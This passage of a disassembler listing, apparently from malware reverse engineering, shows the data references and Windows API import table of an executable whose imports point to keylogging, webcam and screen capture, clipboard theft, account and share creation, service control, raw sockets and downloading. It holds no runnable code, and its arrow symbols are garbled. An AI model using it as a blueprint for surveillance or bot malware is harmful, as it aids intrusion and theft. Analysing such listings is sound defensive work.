extrn unk_440B7E ; DATA XREF: sub_401444+1DE�w
extrn unk_440B80 ; DATA XREF: sub_401444+1E5�w
extrn unk_440B81 ; DATA XREF: sub_401444+1EC�w
extrn unk_440B82 ; DATA XREF: sub_401444+1F2�w
extrn unk_440B84 ; DATA XREF: sub_401444+220�w
; sub_401444+23E�w
extrn unk_440B88 ; DATA XREF: sub_401444+246�w
extrn unk_440B8C ; DATA XREF: sub_401444+258�w
extrn unk_440B8D ; DATA XREF: sub_401444+26B�w
extrn unk_440B8E ; DATA XREF: sub_401444+283�w
extrn unk_440B90 ; DATA XREF: sub_401444+292�w
extrn unk_440B92 ; DATA XREF: sub_401444+28A�w
extrn unk_440F94 ; DATA XREF: sub_402F10+4�w
; const WCHAR unk_440F98
extrn unk_440F98 ; DATA XREF: sub_4035F5+9E�o
; CHAR CommandLine
extrn CommandLine:byte ; DATA XREF: sub_4035F5+36�r
; sub_4036D8+37�r ...
; u_short dword_440FA0
extrn dword_440FA0:dword ; DATA XREF: .text:00403C95�w
; sub_403C9C+30�r ...
; const CHAR byte_440FAC
extrn byte_440FAC:byte ; DATA XREF: sub_4057F1+2F�r
; sub_41EE0F+57�o ...
; u_short dword_4410C0
extrn dword_4410C0:dword ; DATA XREF: sub_403C9C+88�r
; .text:00404E3F�r ...
; SOCKET unk_4410C4
extrn unk_4410C4 ; DATA XREF: sub_4062E4+2A�w
; sub_4062E4+51�r ...
; struct in_addr in
extrn in:in_addr ; DATA XREF: sub_407AD1+18�r
; sub_407F8A+92�w ...
extrn unk_4410CC ; DATA XREF: sub_4080C3+1F7�r
; sub_4082D7+D9�w ...
extrn unk_443FA8 ; DATA XREF: sub_407B48+324�w
; sub_407B48+37D�o
extrn unk_444338 ; DATA XREF: sub_407B48+309�w
; sub_407B48+330�r
extrn unk_444340 ; DATA XREF: sub_407B48+373�w
; sub_407B48+38F�r
extrn unk_444344 ; DATA XREF: sub_407B48+336�w
extrn unk_444348 ; DATA XREF: sub_407B48+343�w
extrn unk_44434C ; DATA XREF: sub_407B48+303�w
extrn unk_444354 ; DATA XREF: sub_407B48:loc_407F0C�r
; struct _RTL_CRITICAL_SECTION CriticalSection
extrn CriticalSection ; DATA XREF: sub_4080C3+C0�o
; sub_4082D7+65�o ...
extrn unk_444370 ; DATA XREF: sub_407B48+86�w
; sub_407B48+103�o
extrn unk_44457C ; DATA XREF: sub_407B48+F9�w
; sub_407B48+115�r
extrn unk_444580 ; DATA XREF: sub_407B48+56�w
extrn unk_444584 ; DATA XREF: sub_407B48+51�w
; sub_407B48+D6�r
extrn unk_444608 ; DATA XREF: sub_407B48+93�w
extrn unk_44460C ; DATA XREF: sub_407B48+A8�w
; sub_407B48+C5�w
extrn unk_444610 ; DATA XREF: sub_407B48:loc_407D4E�r
extrn unk_444618 ; DATA XREF: sub_407B48+1D0�w
; sub_407B48+262�o
extrn unk_444824 ; DATA XREF: sub_407B48+258�w
; sub_407B48+274�r
extrn unk_444828 ; DATA XREF: sub_407B48+1A0�w
extrn unk_44482C ; DATA XREF: sub_407B48+19B�w
; sub_407B48+235�r
extrn unk_4448B0 ; DATA XREF: sub_407B48+1DD�w
extrn unk_4448B4 ; DATA XREF: sub_407B48+1F2�w
; sub_407B48+224�w
extrn unk_4448B8 ; DATA XREF: sub_407B48:loc_407EF7�r
extrn unk_4448C4 ; DATA XREF: sub_40913F+F�r
; sub_409338+12�r
; WCHAR Buffer
extrn Buffer:word ; DATA XREF: sub_409990+C7�o
; WCHAR word_4452C8
extrn word_4452C8:word ; DATA XREF: sub_409990+D6�o
extrn unk_445AC8 ; CODE XREF: sub_409B62+94�p
; DATA XREF: sub_409990+86�w ...
extrn unk_445ACC ; CODE XREF: sub_409FBC+55�p
; sub_40A053+66�p
; DATA XREF: ...
extrn unk_445AD0 ; CODE XREF: sub_409B62+D6�p
; sub_409B62+173�p
; DATA XREF: ...
extrn unk_445AD4 ; CODE XREF: sub_409B62+35�p
; sub_409B62+65�p
; DATA XREF: ...
extrn unk_445CD8 ; CODE XREF: sub_409B62+A2�p
; DATA XREF: sub_409990+93�w ...
extrn unk_445CDC ; DATA XREF: sub_409990+103�r
; sub_409FBC+5�r ...
extrn unk_445CE0 ; DATA XREF: sub_409CEB+178�w
; sub_409E8F+107�w
extrn unk_445CE4 ; DATA XREF: sub_409CEB+17D�w
; sub_409E8F+10D�w ...
extrn unk_445CE8 ; DATA XREF: sub_409CEB+156�w
; sub_409FBC+4F�r
;
; Imports from gdi32.dll
;
; BOOL __stdcall DeleteDC(HDC hdc)
extrn DeleteDC:dword ; CODE XREF: sub_408F04+210�p
; sub_408F04+21A�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall Module32First(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
extrn Module32First:dword ; CODE XREF: sub_41615A+159�p
; DATA XREF: sub_40A16C+65�w ...
;
; Imports from wininet.dll
;
extrn InternetGetConnectedStateEx:dword ; CODE XREF: sub_40C672+38�p
; DATA XREF: sub_40A16C+7ED�w ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetUserDel(LPCWSTR servername, LPCWSTR username)
extrn NetUserDel:dword ; CODE XREF: sub_40EA93+19�p
; DATA XREF: sub_40A16C+9BA�w ...
; DWORD __stdcall NetShareDel(LPWSTR servername, LPWSTR netname, DWORD reserved)
extrn NetShareDel:dword ; CODE XREF: sub_40E82A+1B�p
; DATA XREF: sub_40A16C+96C�w ...
;
; Imports from gdi32.dll
;
; HGDIOBJ __stdcall SelectObject(HDC hdc, HGDIOBJ h)
extrn SelectObject:dword ; CODE XREF: sub_408F04+D1�p
; DATA XREF: sub_408F04+D1�r ...
;
; Imports from user32.dll
;
; SHORT __stdcall GetKeyState(int nVirtKey)
extrn GetKeyState:dword ; CODE XREF: sub_402703+287�p
; sub_402703+2A3�p ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetUserAdd(LPCWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err)
extrn NetUserAdd:dword ; CODE XREF: sub_40EA39+51�p
; DATA XREF: sub_40A16C+9AD�w ...
;
; Imports from advapi32.dll
;
; SC_HANDLE __stdcall OpenServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, DWORD dwDesiredAccess)
extrn OpenServiceA:dword ; CODE XREF: sub_40E2F8+31�p
; DATA XREF: sub_40A16C+354�w ...
; BOOL __stdcall GetUserNameA(LPSTR lpBuffer, LPDWORD pcbBuffer)
extrn GetUserNameA:dword ; CODE XREF: sub_40C3BE+139�p
; DATA XREF: sub_40A16C+3F1�w ...
; BOOL __stdcall StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors)
extrn StartServiceA:dword ; CODE XREF: sub_40E2F8+72�p
; DATA XREF: sub_40A16C+361�w ...
; BOOL __stdcall IsValidSecurityDescriptor(PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn IsValidSecurityDescriptor:dword ; CODE XREF: sub_40E84D+AD�p
; DATA XREF: sub_40A16C+3A2�w ...
;
; Imports from ws2_32.dll
;
; int __stdcall _WSAFDIsSet_0(SOCKET fd, fd_set *)
extrn __WSAFDIsSet_0:dword ; CODE XREF: sub_406428+115�p
; sub_408E0B+76�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall GetDiskFreeSpaceExA(LPCSTR lpDirectoryName, PULARGE_INTEGER lpFreeBytesAvailableToCaller, PULARGE_INTEGER lpTotalNumberOfBytes, PULARGE_INTEGER lpTotalNumberOfFreeBytes)
extrn GetDiskFreeSpaceExA:dword ; CODE XREF: sub_40DC4A+33�p
; DATA XREF: sub_40A16C+72�w ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetShareAdd(LPWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err)
extrn NetShareAdd:dword ; CODE XREF: sub_40E77E+62�p
; DATA XREF: sub_40A16C+95F�w ...
;
; Imports from advapi32.dll
;
; BOOL __stdcall CloseServiceHandle(SC_HANDLE hSCObject)
extrn CloseServiceHandle:dword ; CODE XREF: sub_40E2F8+8E�p
; sub_40E2F8+95�p ...
;
; Imports from wininet.dll
;
extrn InternetCrackUrlA:dword ; CODE XREF: sub_40C7E2+AF�p
; DATA XREF: sub_40A16C+83B�w ...
;
; Imports from advapi32.dll
;
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_409577+58�p
; DATA XREF: sub_409577+58�r ...
;
; Imports from wininet.dll
;
extrn InternetOpenUrlA:dword ; CODE XREF: sub_40D66D+3A�p
; DATA XREF: sub_40A16C+82E�w ...
extrn byte_445D38:byte:4 ; DATA XREF: sub_40A16C+B3�w
;
; Imports from wininet.dll
;
extrn InternetReadFile:dword ; CODE XREF: sub_40D66D+109�p
; DATA XREF: sub_40A16C+848�w ...
;
; Imports from ws2_32.dll
;
; int __stdcall WSAAsyncSelect(SOCKET s, HWND hWnd, u_int wMsg, __int32 lEvent)
extrn WSAAsyncSelect:dword ; CODE XREF: sub_40852E+81�p
; DATA XREF: sub_40852E+81�r ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
extrn Process32Next:dword ; CODE XREF: sub_41615A+AB�p
; sub_41615A+1D0�p
; DATA XREF: ...
;
; Imports from iphlpapi.dll
;
extrn IcmpSendEcho:dword ; CODE XREF: sub_40182F+11A�p
; DATA XREF: sub_40182F+11A�r ...
;
; Imports from dnsapi.dll
;
extrn DnsFlushResolverCache:dword ; CODE XREF: sub_40FCA3+5821�p
; DATA XREF: sub_40A16C+A66�w ...
extrn byte_445D50:byte:4 ; DATA XREF: sub_40A16C+A6�w
; sub_40A16C+F2�r
;
; Imports from gdi32.dll
;
; UINT __stdcall GetDIBColorTable(HDC hdc, UINT iStart, UINT cEntries, RGBQUAD *prgbq)
extrn GetDIBColorTable:dword ; CODE XREF: sub_408F04+119�p
; DATA XREF: sub_408F04+119�r ...
;
; Imports from ws2_32.dll
;
; u_long __stdcall htonl(u_long hostlong)
extrn htonl:dword ; CODE XREF: sub_407F42+20�p
; sub_4169D6+C6�p
; DATA XREF: ...
extrn byte_445D5C:byte:4 ; DATA XREF: sub_40A16C+9A0�w
; sub_40A16C+A08�r
;
; Imports from ws2_32.dll
;
; u_short __stdcall htons_1(u_short hostshort)
extrn htons_1:dword ; CODE XREF: sub_402BB1+280�p
; sub_40D090+A5�p
; DATA XREF: ...
;
; Imports from mpr.dll
;
; DWORD __stdcall WNetCancelConnection2W(LPCWSTR lpName, DWORD dwFlags, BOOL fForce)
extrn WNetCancelConnection2W:dword ; CODE XREF: sub_4036D8+A7�p
; DATA XREF: sub_4036D8+A7�r ...
;
; Imports from wininet.dll
;
extrn InternetGetConnectedState:dword ; CODE XREF: sub_40F1EA+5ED�p
; DATA XREF: sub_40A16C+7E0�w ...
;
; Imports from user32.dll
;
; BOOL __stdcall ExitWindowsEx(UINT uFlags, DWORD dwReason)
extrn ExitWindowsEx:dword ; CODE XREF: sub_40B562+15�p
; DATA XREF: sub_40A16C+1B3�w ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetShareEnum(LPWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle)
extrn NetShareEnum:dword ; CODE XREF: sub_40E84D+53�p
; sub_416B27+19F�p
; DATA XREF: ...
;
; Imports from advapi32.dll
;
; BOOL __stdcall ControlService(SC_HANDLE hService, DWORD dwControl, LPSERVICE_STATUS lpServiceStatus)
extrn ControlService:dword ; CODE XREF: sub_40E2F8+63�p
; DATA XREF: sub_40A16C+36E�w ...
; BOOL __stdcall DeleteService(SC_HANDLE hService)
extrn DeleteService:dword ; CODE XREF: sub_40E2F8+7B�p
; DATA XREF: sub_40A16C+37B�w ...
;
; Imports from avicap32.dll
;
extrn capCreateCaptureWindowA:dword ; CODE XREF: sub_40913F+28�p
; sub_409338+2B�p
; DATA XREF: ...
extrn byte_445D80:byte:4 ; DATA XREF: sub_40A16C+68E�w
;
; Imports from ws2_32.dll
;
; int __stdcall WSACleanup_0()
extrn WSACleanup_0:dword ; CODE XREF: sub_4010B2:loc_4013B3�p
; sub_401E07:loc_402083�p ...
;
; Imports from gdi32.dll
;
; BOOL __stdcall DeleteObject(HGDIOBJ ho)
extrn DeleteObject:dword ; CODE XREF: sub_408F04+207�p
; DATA XREF: sub_408F04+207�r ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetUserEnum(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle)
extrn NetUserEnum:dword ; CODE XREF: sub_40EE82+57�p
; DATA XREF: sub_40A16C+9C7�w ...
;
; Imports from advapi32.dll
;
; LSTATUS __stdcall RegDeleteValueA(HKEY hKey, LPCSTR lpValueName)
extrn RegDeleteValueA:dword ; CODE XREF: sub_40CD17+55�p
; DATA XREF: sub_40A16C+2B2�w ...
;
; Imports from kernel32.dll
;
; DWORD __stdcall GetLogicalDriveStringsA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetLogicalDriveStringsA:dword ; CODE XREF: sub_40DE7F+25�p
; sub_40DE7F+39�p
; DATA XREF: ...
;
; Imports from shell32.dll
;
; HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd)
extrn ShellExecuteA:dword ; CODE XREF: sub_40D66D+331�p
; sub_40FCA3+2C13�p ...
;
; Imports from ws2_32.dll
;
; int __stdcall WSAStartup_0(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup_0:dword ; CODE XREF: sub_4010B2+2F�p
; sub_401E07+2F�p ...
;
; Imports from wininet.dll
;
extrn HttpSendRequestA:dword ; CODE XREF: sub_40C7E2+182�p
; DATA XREF: sub_40A16C+807�w ...
extrn byte_445DA4:byte:4 ; DATA XREF: sub_40A16C+986�w
; sub_40A16C+9F8�r
;
; Imports from odbc32.dll
;
extrn SQLAllocHandle:dword ; CODE XREF: .text:004053EE�p
; .text:00405420�p ...
;
; Imports from user32.dll
;
; HWND __stdcall GetForegroundWindow()
extrn GetForegroundWindow:dword ; CODE XREF: sub_402703+40�p
; sub_402703+63�p ...
;
; Imports from iphlpapi.dll
;
; HANDLE __stdcall IcmpCreateFile()
extrn IcmpCreateFile:dword ; CODE XREF: sub_40182F+29�p
; DATA XREF: sub_40182F+29�r ...
extrn byte_445DB4:byte:4 ; DATA XREF: sub_40A16C+BF9�w
;
; Imports from ws2_32.dll
;
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_4010B2:loc_4013BF�p
; sub_401444+3C�p ...
;
; Imports from wininet.dll
;
extrn InternetOpenA:dword ; CODE XREF: sub_40A16C+8B9�p
; DATA XREF: sub_40A16C+821�w ...
;
; Imports from user32.dll
;
; int __stdcall GetWindowTextA(HWND hWnd, LPSTR lpString, int nMaxCount)
extrn GetWindowTextA:dword ; CODE XREF: sub_402703+50�p
; sub_402703+7C�p ...
; BOOL __stdcall IsWindow(HWND hWnd)
extrn IsWindow:dword ; CODE XREF: sub_40913F+3F�p
; sub_40913F+69�p ...
;
; Imports from ws2_32.dll
;
; int __stdcall getsockname(SOCKET s, struct sockaddr *name, int *namelen)
extrn getsockname:dword ; CODE XREF: sub_40B972+27�p
; sub_40D090+9C�p ...
; int __stdcall connect_0(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect_0:dword ; CODE XREF: .text:00403BE8�p
; sub_403C9C+5E�p ...
; int __stdcall WSAIoctl(SOCKET s, DWORD dwIoControlCode, LPVOID lpvInBuffer, DWORD cbInBuffer, LPVOID lpvOutBuffer, DWORD cbOutBuffer, LPDWORD lpcbBytesReturned, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSAIoctl:dword ; CODE XREF: sub_402BB1+16E�p
; sub_40321F+12C�p
; DATA XREF: ...
extrn byte_445DD4:byte:4 ; DATA XREF: sub_40A16C+8BD�w
; sub_40A16C:loc_40AA47�w ...
;
; Imports from advapi32.dll
;
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition)
extrn RegCreateKeyExA:dword ; CODE XREF: sub_40CD17+2A�p
; sub_40F1EA+3C9�p
; DATA XREF: ...
;
; Imports from ws2_32.dll
;
; struct hostent *__stdcall gethostbyaddr(const char *addr, int len, int type)
extrn gethostbyaddr:dword ; CODE XREF: sub_4086BE+98�p
; sub_40C3BE+156�p ...
;
; Imports from advapi32.dll
;
; BOOL __stdcall LookupPrivilegeValueA(LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid)
extrn LookupPrivilegeValueA:dword ; CODE XREF: sub_4160EF+2A�p
; DATA XREF: sub_40A16C+30F�w ...
; BOOL __stdcall EnumServicesStatusA(SC_HANDLE hSCManager, DWORD dwServiceType, DWORD dwServiceState, LPENUM_SERVICE_STATUSA lpServices, DWORD cbBufSize, LPDWORD pcbBytesNeeded, LPDWORD lpServicesReturned, LPDWORD lpResumeHandle)
extrn EnumServicesStatusA:dword ; CODE XREF: sub_40E518+57�p
; DATA XREF: sub_40A16C+395�w ...
;
; Imports from odbc32.dll
;
extrn SQLExecDirect:dword ; CODE XREF: .text:00405523�p
; .text:0040556C�p
; DATA XREF: ...
;
; Imports from wininet.dll
;
extrn HttpOpenRequestA:dword ; CODE XREF: sub_40C7E2+170�p
; DATA XREF: sub_40A16C+7FA�w ...
;
; Imports from user32.dll
;
; SHORT __stdcall GetAsyncKeyState(int vKey)
extrn GetAsyncKeyState:dword ; CODE XREF: sub_402703+1DF�p
; sub_402703+297�p
; DATA XREF: ...
; BOOL __stdcall OpenClipboard(HWND hWndNewOwner)
extrn OpenClipboard:dword ; CODE XREF: sub_40B401+3�p
; DATA XREF: sub_40A16C+18C�w ...
;
; Imports from wininet.dll
;
extrn InternetConnectA:dword ; CODE XREF: sub_40C7E2+149�p
; DATA XREF: sub_40A16C+814�w ...
;
; Imports from ws2_32.dll
;
; int __stdcall recvfrom(SOCKET s, char *buf, int len, int flags, struct sockaddr *from, int *fromlen)
extrn recvfrom:dword ; CODE XREF: sub_407516+244�p
; DATA XREF: sub_407516+244�r ...
;
; Imports from advapi32.dll
;
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_409577+196�p
; sub_40CD17+5E�p ...
;
; Imports from ws2_32.dll
;
; int __stdcall setsockopt_0(SOCKET s, int level, int optname, const char *optval, int optlen)
extrn setsockopt_0:dword ; CODE XREF: sub_4010B2+6F�p
; sub_401444+AA�p ...
;
; Imports from advapi32.dll
;
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_4160EF+13�p
; DATA XREF: sub_40A16C+302�w ...
;
; Imports from ws2_32.dll
;
; int __stdcall select_0(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, const struct timeval *timeout)
extrn select_0:dword ; CODE XREF: sub_406428+F9�p
; sub_407516+1FC�p ...
;
; Imports from gdi32.dll
;
; HDC __stdcall CreateDCA(LPCSTR pwszDriver, LPCSTR pwszDevice, LPCSTR pszPort, const DEVMODEA *pdm)
extrn CreateDCA:dword ; CODE XREF: sub_408F04+16�p
; DATA XREF: sub_408F04+16�r ...
;
; Imports from user32.dll
;
; HANDLE __stdcall GetClipboardData(UINT uFormat)
extrn GetClipboardData:dword ; CODE XREF: sub_40B401+F�p
; DATA XREF: sub_40A16C+199�w ...
;
; Imports from advapi32.dll
;
; SC_HANDLE __stdcall OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess)
extrn OpenSCManagerA:dword ; CODE XREF: sub_40E2F8+11�p
; sub_40E518+18�p
; DATA XREF: ...
extrn byte_445E1C:byte:4 ; DATA XREF: sub_40A16C+A73�w
;
; Imports from ws2_32.dll
;
; u_long __stdcall htonl_0(u_long hostlong)
extrn htonl_0:dword ; CODE XREF: sub_4010B2+EB�p
; sub_4010B2+1F9�p ...
; u_short __stdcall htons_2(u_short hostshort)
extrn htons_2:dword ; CODE XREF: sub_4010B2+87�p
; sub_4010B2+9D�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
extrn Process32First:dword ; CODE XREF: sub_41615A+8F�p
; DATA XREF: sub_40A16C+4B�w ...
;
; Imports from gdi32.dll
;
; int __stdcall GetDeviceCaps(HDC hdc, int index)
extrn GetDeviceCaps:dword ; CODE XREF: sub_408F04+2C�p
; sub_408F04+38�p ...
;
; Imports from user32.dll
;
; HWND __stdcall FindWindowA(LPCSTR lpClassName, LPCSTR lpWindowName)
extrn FindWindowA:dword ; CODE XREF: sub_40B43C+C�p
; sub_4167FE+1F�p
; DATA XREF: ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetMessageBufferSend(LPCWSTR servername, LPCWSTR msgname, LPCWSTR fromname, LPBYTE buf, DWORD buflen)
extrn NetMessageBufferSend:dword ; CODE XREF: sub_40F12C+72�p
; DATA XREF: sub_40A16C+9E1�w ...
;
; Imports from ws2_32.dll
;
; int __stdcall gethostname(char *name, int namelen)
extrn gethostname:dword ; CODE XREF: sub_40321F+59�p
; DATA XREF: sub_40321F+59�r ...
; int __stdcall recv_0(SOCKET s, char *buf, int len, int flags)
extrn recv_0:dword ; CODE XREF: sub_402BB1+206�p
; sub_40321F+1C2�p ...
;
; Imports from odbc32.dll
;
extrn SQLFreeHandle:dword ; CODE XREF: .text:0040557F�p
; .text:00405630�p ...
;
; Imports from kernel32.dll
;
; HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID)
extrn CreateToolhelp32Snapshot:dword ; CODE XREF: sub_41615A+69�p
; sub_41615A+139�p
; DATA XREF: ...
;
; Imports from advapi32.dll
;
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_40CD17+49�p
; sub_40F1EA+3F0�p ...
;
; Imports from ws2_32.dll
;
; int __stdcall listen_0(SOCKET s, int backlog)
extrn listen_0:dword ; CODE XREF: sub_406428+9E�p
; sub_40852E+A2�p ...
; int __stdcall bind_0(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind_0:dword ; CODE XREF: sub_402BB1+EB�p
; sub_40321F+AD�p ...
;
; Imports from avicap32.dll
;
extrn capGetDriverDescriptionA:dword ; CODE XREF: sub_40FCA3+46FA�p
; DATA XREF: sub_40A16C+C63�w ...
;
; Imports from wininet.dll
;
extrn InternetCloseHandle:dword ; CODE XREF: sub_40C7E2+209�p
; sub_40C7E2+212�p ...
extrn byte_445E5C:byte:4 ; DATA XREF: sub_40A16C+112�w
;
; Imports from odbc32.dll
;
extrn SQLDriverConnect:dword ; CODE XREF: .text:004054AC�p
; DATA XREF: .text:004054AC�r ...
;
; Imports from ws2_32.dll
;
; unsigned __int32 __stdcall inet_addr_0(const char *cp)
extrn inet_addr_0:dword ; CODE XREF: sub_401444+119�p
; sub_401444+1A0�p ...
;
; Imports from gdi32.dll
;
; HBITMAP __stdcall CreateDIBSection(HDC hdc, const BITMAPINFO *lpbmi, UINT usage, void **ppvBits, HANDLE hSection, DWORD offset)
extrn CreateDIBSection:dword ; CODE XREF: sub_408F04+BC�p
; DATA XREF: sub_408F04+BC�r ...
; BOOL __stdcall BitBlt(HDC hdc, int x, int y, int cx, int cy, HDC hdcSrc, int x1, int y1, DWORD rop)
extrn BitBlt:dword ; CODE XREF: sub_408F04+FB�p
; DATA XREF: sub_408F04+FB�r ...
; HDC __stdcall CreateCompatibleDC(HDC hdc)
extrn CreateCompatibleDC:dword ; CODE XREF: sub_408F04+65�p
; DATA XREF: sub_408F04+65�r ...
;
; Imports from ws2_32.dll
;
; int __stdcall send_0(SOCKET s, const char *buf, int len, int flags)
extrn send_0:dword ; CODE XREF: .text:00403BFF�p
; .text:00403C27�p ...
;
; Imports from user32.dll
;
; BOOL __stdcall CloseClipboard()
extrn CloseClipboard:dword ; CODE XREF: sub_40B401+2C�p
; DATA XREF: sub_40A16C+1A6�w ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetUserGetInfo(LPCWSTR servername, LPCWSTR username, DWORD level, LPBYTE *bufptr)
extrn NetUserGetInfo:dword ; CODE XREF: sub_40EAB4+2A�p
; DATA XREF: sub_40A16C+9D4�w ...
;
; Imports from user32.dll
;
; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendMessageA:dword ; CODE XREF: sub_40913F+53�p
; sub_40913F+7F�p ...
;
; Imports from kernel32.dll
;
; UINT __stdcall GetDriveTypeA(LPCSTR lpRootPathName)
extrn GetDriveTypeA:dword ; CODE XREF: sub_40DC01+4�p
; sub_416E4D+246�p
; DATA XREF: ...
;
; Imports from ws2_32.dll
;
; int __stdcall sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen)
extrn sendto:dword ; CODE XREF: sub_4010B2+2C2�p
; sub_401444+2C8�p ...
extrn byte_445E8C:byte:4 ; DATA XREF: sub_40A16C+B14�w
; sub_40A16C+B30�r
;
; Imports from advapi32.dll
;
; BOOL __stdcall AdjustTokenPrivileges(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength)
extrn AdjustTokenPrivileges:dword ; CODE XREF: sub_4160EF+55�p
; DATA XREF: sub_40A16C+31C�w ...
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_409577+3F�p
; sub_416B27+2E�p ...
extrn byte_445E98:byte:4 ; DATA XREF: sub_40A16C+B7B�w
;
; Imports from iphlpapi.dll
;
; DWORD __stdcall DeleteIpNetEntry(PMIB_IPNETROW pArpEntry)
extrn DeleteIpNetEntry:dword ; CODE XREF: sub_40B89A+8F�p
; DATA XREF: sub_40A16C+ABD�w ...
; ULONG __stdcall GetIpNetTable(PMIB_IPNETTABLE IpNetTable, PULONG SizePointer, BOOL Order)
extrn GetIpNetTable:dword ; CODE XREF: sub_40B89A+1F�p
; sub_40B89A+7D�p
; DATA XREF: ...
;
; Imports from ws2_32.dll
;
; SOCKET __stdcall socket_0(int af, int type, int protocol)
extrn socket_0:dword ; CODE XREF: sub_401444+2E�p
; sub_4019BB+3C�p ...
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_40182F+51�p
; sub_4019BB+77�p ...
;
; Imports from odbc32.dll
;
extrn SQLSetEnvAttr:dword ; CODE XREF: .text:00405405�p
; DATA XREF: .text:00405405�r ...
;
; Imports from ws2_32.dll
;
; char *__stdcall inet_ntoa_0(struct in_addr in)
extrn inet_ntoa_0:dword ; CODE XREF: sub_402BB1+28D�p
; sub_407516+250�p ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetApiBufferFree(LPVOID Buffer)
extrn NetApiBufferFree:dword ; CODE XREF: sub_40E84D+103�p
; sub_40EAB4+3C2�p ...
;
; Imports from ws2_32.dll
;
; SOCKET __stdcall accept_0(SOCKET s, struct sockaddr *addr, int *addrlen)
extrn accept_0:dword ; CODE XREF: sub_406428+13D�p
; sub_40852E+BB�p ...
; int __stdcall closesocket_0(SOCKET s)
extrn closesocket_0:dword ; CODE XREF: sub_4010B2+2FA�p
; sub_401444+2F4�p ...
; int __stdcall ioctlsocket_0(SOCKET s, __int32 cmd, u_long *argp)
extrn ioctlsocket_0:dword ; CODE XREF: sub_406428+B7�p
; sub_406428+376�p ...
;
; Imports from mpr.dll
;
; DWORD __stdcall WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserName, DWORD dwFlags)
extrn WNetAddConnection2W:dword ; CODE XREF: sub_4035F5+B0�p
; sub_4035F5+C8�p
; DATA XREF: ...
;
; Imports from ws2_32.dll
;
; SOCKET __stdcall WSASocketA(int af, int type, int protocol, LPWSAPROTOCOL_INFOA lpProtocolInfo, GROUP g, DWORD dwFlags)
extrn WSASocketA:dword ; CODE XREF: sub_4010B2+4F�p
; sub_401E07+4F�p
; DATA XREF: ...
extrn byte_445ECC:byte:4 ; DATA XREF: sub_40A16C+AFA�w
; sub_40A16C+B1B�r
;
; Imports from kernel32.dll
;
; UINT __stdcall SetErrorMode(UINT uMode)
extrn SetErrorMode:dword ; CODE XREF: sub_40F1EA+5F�p
; DATA XREF: sub_40A16C+31�w ...
;
; Imports from user32.dll
;
; BOOL __stdcall DestroyWindow(HWND hWnd)
extrn DestroyWindow:dword ; CODE XREF: sub_40913F+1EC�p
; sub_409338+232�p
; DATA XREF: ...
;
; Imports from iphlpapi.dll
;
; BOOL __stdcall IcmpCloseHandle(HANDLE IcmpHandle)
extrn IcmpCloseHandle:dword ; CODE XREF: sub_40182F+129�p
